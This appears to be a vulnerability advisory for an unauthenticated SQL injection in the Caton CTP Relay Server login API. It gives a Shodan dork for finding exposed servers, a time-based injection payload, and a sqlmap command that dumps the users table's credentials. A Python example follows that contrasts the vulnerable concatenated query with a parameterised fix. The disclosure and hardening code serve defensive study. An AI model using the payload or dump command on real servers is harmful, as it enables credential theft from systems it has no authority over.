| Field | Value |
|---|---|
| Title | Caton CTP Relay Server unknown version - SQL Injection Unauthenticated |
| Source | ⚠️ .. |
| User | mrempy (UID 24379) |
| Submission | 21.04.2023 07:16 (3 years ago) |
| Moderation | 04.05.2023 17:56 (13 days later) |
| Status | accepted |
| VulDB entry | 228010 [Caton CTP Relay Server 1.2.9 API /server/api/v1/login username/password SQL injection] |
| Points | 17 |

Description
================

```text
# Exploit Title: Caton CTP Relay Server unknown version - SQL Injection Unauthenticated
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: unknown
# Shodan Dork: http.favicon.hash:-940032039 title:"Caton CTP Relay Server"
```

Title:
================

Caton CTP Relay Server unknown version - SQL Injection Unauthenticated

Summary:
================

A SQL injection vulnerability without authentication has been found in the Caton CTP Relay Server product, in an unknown version. This vulnerability allows an attacker to execute malicious SQL commands against the system's underlying database, which could result in unauthorized disclosure of sensitive information such as user credentials, payment details, and other sensitive data.

The vulnerability was found on the system's login page, at the "/server/api/v1/login" endpoint, where users send their access credentials to log in to the system. The vulnerable parameters are "username" and "password", which are sent as JSON via POST.

By exploiting this vulnerability, an attacker could insert malicious SQL commands into the "username" and "password" parameters, which will be executed without proper validation. This could allow the attacker to execute malicious commands against the system's database, such as retrieving confidential information or manipulating data.

It is important to note that this vulnerability does not require user authentication, which means that anyone could exploit it without needing valid system credentials.

Severity Level:
================

7.5 (High)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Affected Product:
================

Caton CTP Relay Server unknown version

Proof of Concept:
================

Request:

```http
POST /server/api/v1/login HTTP/1.1
Host: target
Content-Length: 117
Accept: application/json, text/plain, */*
Accept-Language: en
X-Access-Token:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: application/json
Origin: http://target
Referer: http://target/login
Accept-Encoding: gzip, deflate
Connection: close

{"username":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR","password":"3xpl'XOR(if(now()=sysdate(),sleep(10),0))XOR"}
```

SQLMap command:

```text
sqlmap -u 'http://target/server/api/v1/login' --data='{"username":"3xpl","password":"3xpl"}' -p username --risk 3 --level 5 --batch --random-agent --dbms=MySQL --technique=B --threads=10 -D rrsWeb -T users -C username,password --dump
```
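The advisory describes a login endpoint whose JSON "username" and "password" values end up inside the SQL text. The Caton CTP Relay Server source is not public, so the following Python is an added example, not the product's code: it shows the assumed vulnerable pattern (string concatenation) beside a hardened handler that binds the username as a parameter and never sends the password to the database at all. The table schema, the PBKDF2 password storage, the length limit and all function names are assumptions; the in-memory SQLite database is constructed for the demo, and `PAYLOAD_BODY` is the request body quoted in the advisory.

```python
"""Vulnerable vs. hardened login lookup for a JSON {"username","password"} body.
Schema, constants and function names are assumptions made for this example."""
import hashlib
import json
import secrets
import sqlite3
from typing import Optional, Tuple

MAX_FIELD_LEN = 64            # assumed policy: bound both credential fields
PBKDF2_ITERATIONS = 100_000   # constructed value for the demo

# Request body exactly as quoted in the advisory's proof of concept.
PAYLOAD_BODY = ('{"username":"3xpl\'XOR(if(now()=sysdate(),sleep(10),0))XOR",'
                '"password":"3xpl\'XOR(if(now()=sysdate(),sleep(10),0))XOR"}')
PAYLOAD = json.loads(PAYLOAD_BODY)["username"]


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory database with one account: admin / 'correct horse'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, "
                 "salt BLOB NOT NULL, pw_hash BLOB NOT NULL)")
    salt = secrets.token_bytes(16)
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", salt, _hash_password("correct horse", salt)))
    conn.commit()
    return conn


def build_vulnerable_query(username: str) -> str:
    """The anti-pattern the advisory implies: the JSON value is spliced into the
    SQL text, so a single quote ends the literal and the rest is parsed as SQL."""
    return "SELECT username, salt, pw_hash FROM users WHERE username = '" + username + "'"


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> Tuple[Optional[tuple], Optional[str]]:
    """Runs the concatenated query and returns (row, error). With the advisory's
    payload SQLite reports a syntax error because the injected text reached the SQL
    parser; on MySQL the same text would instead be evaluated as a sleep() branch."""
    try:
        return conn.execute(build_vulnerable_query(username)).fetchone(), None
    except sqlite3.Error as exc:
        return None, str(exc)


def parse_login_body(body: str) -> Optional[dict]:
    """Accept only a JSON object with two non-empty, length-bounded strings."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    if not isinstance(data, dict):
        return None
    user, pw = data.get("username"), data.get("password")
    if not (isinstance(user, str) and isinstance(pw, str)):
        return None
    if not (0 < len(user) <= MAX_FIELD_LEN and 0 < len(pw) <= MAX_FIELD_LEN):
        return None
    return {"username": user, "password": pw}


def safe_login(conn: sqlite3.Connection, body: str) -> Optional[str]:
    """Parameterised lookup: the username is a bound value, never SQL text, and the
    password is checked in application code against a salted PBKDF2 hash."""
    creds = parse_login_body(body)
    if creds is None:
        return None
    row = conn.execute("SELECT username, salt, pw_hash FROM users WHERE username = ?",
                       (creds["username"],)).fetchone()
    if row is None:
        return None
    username, salt, stored = row
    if not secrets.compare_digest(stored, _hash_password(creds["password"], salt)):
        return None
    return username


if __name__ == "__main__":
    db = build_demo_db()
    print("valid login      ->", safe_login(db, '{"username":"admin","password":"correct horse"}'))
    print("payload, safe    ->", safe_login(db, PAYLOAD_BODY))
    print("payload, unsafe  ->", vulnerable_lookup(db, PAYLOAD))
```

Note that the payload passes the length check (44 characters), so the hardened path rejects it purely because the bound value matches no username; the input validation is defence in depth, not the fix. The fix is that the database never sees attacker-controlled SQL.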